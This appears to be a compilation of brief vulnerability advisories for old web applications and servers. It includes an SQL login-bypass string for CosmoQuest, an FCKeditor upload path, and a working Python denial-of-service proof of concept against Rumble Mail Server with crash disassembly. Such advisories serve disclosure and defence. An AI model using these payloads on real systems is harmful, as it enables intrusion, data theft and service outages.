A buffer overflow vulnerability exists in Word List Builder 1.0 when a specially crafted .dic file is opened, which could allow an attacker to execute arbitrary code. The vulnerability is due to insufficient boundary checks when processing the .dic file. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application.
A vulnerability exists in a_viewusers.php allowing for SQL injection of the 's' query parameter.
A vulnerability in PHPBoost 3.0 allows an attacker to download the backup database file (*.sql) from the vulnerable server. This vulnerability is due to insufficient access control on the backup directory. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server. Successful exploitation of this vulnerability will allow an attacker to download the backup database file (*.sql) from the vulnerable server.
The vulnerability is triggered by a too large argument (+ path) which simply lets you overwrite eip.
A vulnerability exists in the AdminLogin.asp page of CosmoQuest, which allows an attacker to bypass the login page by using the username 'or''=' and the password 'or''='.
Bigace 2.7.5 is vulnerable to a remote upload file vulnerability. An attacker can exploit this vulnerability by sending a malicious file to the /addon/FCKeditor/editor/filemanager/connectors/uploadtest.html page.
An SQL injection vulnerability exists in IrIran Shoping Script, which allows an attacker to execute arbitrary SQL commands on the underlying database. This can be exploited to gain access to sensitive information, modify data, or even execute system commands. The vulnerability is caused due to the improper sanitization of user-supplied input in the 'id' parameter of the 'page.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands.
Pligg CMS version 1.1.3 is vulnerable to a file existence exploration/shared hosting privilege escalation attack. This attack is possible due to the code in config.php near line 80, which allows a user to set a cookie named 'template' and give it the right directory as value. This can be exploited by creating a cookie named 'template' and giving it the directory of the vulnerable code, which will include(); the file and allow the attacker to execute code as the other user. This attack is especially dangerous in a shared hosting environment, as the attacker can prepare a 'pligg.tpl' file inside a directory called 'templates' and browse to the directory where they stored it to the vulnerable code.
A denial of service vulnerability can be exploited to crash Rumble Mail Server v0.25.2231. rumble_win32.exe: The instruction at 0x96CEEB referenced memory at 0x41414149. The memory could not be read (0x0096CEEB -> 41414149). Disassembly: .text:0096CEEB mov edx, [ecx+8] .text:0096CEEE mov [ebp-8], edx .text:0096CEF1 mov eax, [ebp-8] .text:0096CEF4 mov ecx, [eax] .text:0096CEF6 mov [ebp-0Ch], ecx .text:0096CEF9 mov edx, [ebp+0Ch] .text:0096CEFC mov [ebp-10h], edx .text:0096CEFF .text:0096CEFF loc_96CEFF: ; CODE XREF: .text:0096CF31 .text:0096CEFF mov eax, [ebp-10h] .text:0096CF02 mov cl, [eax] .text:0096CF04 mov [ebp-11h], cl .text:0096CF07 mov edx, [ebp-0Ch] .text:0096CF0A cmp cl, [edx] .text:0096CF0C jnz short loc_96CF3C PoC: import socket host = 'localhost' tld = 'mydomain.tld' port = 25 def crash(): for i in range(0, 16): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.settimeout(32) junk = 'A' * 4096 print s.recv(8192) s.send('HELO ' + tld + '') print s.recv(8192) s.send('MAIL FROM ' + junk + '') print s.recv(8192) s.close() crash()
A persistent cross-site scripting vulnerability in Claroline 1.10 can be exploited to execute arbitrary JavaScript. Enter script tags for the first or last name of a user. The tags are rendered unencoded when viewed in the administration user list.
Services By CQR